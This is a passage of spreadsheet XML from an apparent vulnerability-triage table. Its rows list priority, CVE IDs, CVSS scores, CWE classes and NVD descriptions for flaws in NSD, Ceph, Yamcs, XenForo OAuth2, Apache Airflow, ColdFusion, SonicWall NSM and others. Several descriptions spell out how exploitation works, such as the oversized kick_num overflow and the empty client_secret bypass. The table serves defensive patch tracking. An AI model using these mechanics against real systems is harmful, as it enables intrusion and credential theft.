      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-697</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>When ranges are used for access control (i.e. of the form 1.2.3.4-1.2.3.25), because NSD wrongly compares the IP address with the range on little endian systems, IPs that were meant to be allowed may be denied, and, IPs that were meant to be denied access could be allowed. An IPv4 address is compared with IPv4 ranges as unsigned 32 bit numbers directly with the endianness of the host, but the values to compare are in network byte order (big-endian).  With IPv6 addresses the comparison is done in 4 times a unsigned 32 bit number comparison, again with the endianness of the host where all values are actually in network bye order.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18664</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19874</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in Konami's Metal Gear Online 3, originating from improper validation of lobby data fields related to kicked players. The affected function processes a list of kicked player identifiers using the lobby data key "kick_num" to determine the number of entries, and individual kicked player IDs supplied via keys in the format "kicked_id_%i". The function does not validate that "kick_num" falls within the expected bounds. The game design limits matches to a maximum of 16 players, and the corresponding buffer for storing kicked player IDs is sized accordingly. If "kick_num" exceeds this limit, the function continues writing the provided player IDs past the end of the intended buffer and into adjacent memory regions. These adjacent regions contain Steam callback handler structures responsible for processing lobby data updates, lobby messages, and other related events. By supplying an oversized "kick_num" value and appropriate "kicked_id_%i" fields, an attacker can overwrite fields within the callback handler structures, including function pointers and callback argument values. Successful exploitation may enable control-flow hijacking, potentially allowing arbitrary code execution within the game process.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19874</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50152</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Monitor subscription handler fails to properly authorize access to the configuration-key store, allowing any CephX user with only  `mon allow r` capabilities to read the entire store by sending a single crafted MMonSubscribe message. The config-key store holds sensitive secrets including OSD LUKS disk-encryption passphrases and, on cephadm-managed clusters, the SSH private key that cephadm uses to reach every host in the cluster. Because that key grants root on every node under the default cephadm configuration, a low-privileged read-only account can escalate to full cluster and host compromise. This issue is fixed in versions 20.2.4 and 19.2.6</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50152</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55511</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs allows a user with SystemPrivilege.ControlArchiving to create a double-quoted StreamSQL column name that is interpolated into generated Java source by Expression.fillCode_InputDefVars and Expression.sanitizeName. A sum aggregate reaches yamcs-core/src/main/java/org/yamcs/yarch/streamsql/CompilableAggregateExpression.java and yamcs-core/src/main/java/org/yamcs/yarch/streamsql/funct/SumExpression.java through SelectExpression.compile, where Janino SimpleCompiler.cook compiles the injected source. POST /api/archive/{instance}:executeSql can therefore execute arbitrary Java in the Yamcs server process, exposing mission data and credentials and permitting telemetry tampering or denial of service. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55511</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62646</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="R186"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S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69641</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an authentication bypass vulnerability in the OAuth2 token endpoint that allows unauthenticated attackers to obtain valid token pairs by submitting empty values for client_secret and code_verifier parameters. Attackers can exploit PHP truthy evaluation logic, which treats empty strings as false and skips client secret validation and PKCE code verifier validation, to exchange a valid authorization code for a token pair without proving client identity or holding the PKCE commitment.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an OAuth2 authorization code reuse vulnerability that allows attackers to obtain unauthorized token pairs by submitting a previously used authorization code. Attackers can exploit the failure to invalidate or mark authorization codes as consumed after initial token issuance to receive an independent token pair for the same user and scopes, bypassing the single-use guarantee of the OAuth2 authorization code flow.</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a refresh token replay vulnerability that allows attackers to reuse a refresh token multiple times by exploiting the failure to mark tokens as consumed when the parent access token has expired. Attackers can repeatedly submit the same refresh token to generate additional independent token pairs, achieving persistent unauthorized access for the token's full lifetime.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73475</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr">
        <is>
          <t>centarro:commerce_paypal</t>
        </is>
      </c>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization vulnerability in Drupal Commerce PayPal allows Forceful Browsing. This issue affects Commerce PayPal versions: from 0.0.0 to 1.12.0, from 2.0.0 to 2.1.3.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73475</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75160</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>An issue in X-Serie Gateway Firmware V6_00_05 allows a remote attacker to escalate privileges via the endpoints /cgi-bin/wwwugw.cgi and /cgi-bin/ugwdownload.cgi.</t>
        </is>
      </c>
      <c r="S193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75160</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75431</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr"/>
      <c r="Q194" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>PowerJob Server version 5.1.2 (and likely earlier) uses a predictable JWT signing key for HS256-based authentication. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="S194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75431</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-handler</t>
        </is>
      </c>
      <c r="M195" s="5" t="inlineStr">
        <is>
          <t>4.1.137.Final, 4.2.17.Final</t>
        </is>
      </c>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr"/>
      <c r="P195" s="5" t="inlineStr"/>
      <c r="Q195" s="5" t="inlineStr">
        <is>
          <t>CWE-475, CWE-754</t>
        </is>
      </c>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75746</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr"/>
      <c r="Q196" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker with high privileges could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78327</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr"/>
      <c r="Q197" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows an authenticated attacker with SuperAdmin privileges to inject arbitrary commands that are executed on the underlying host, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78327</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78328</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr"/>
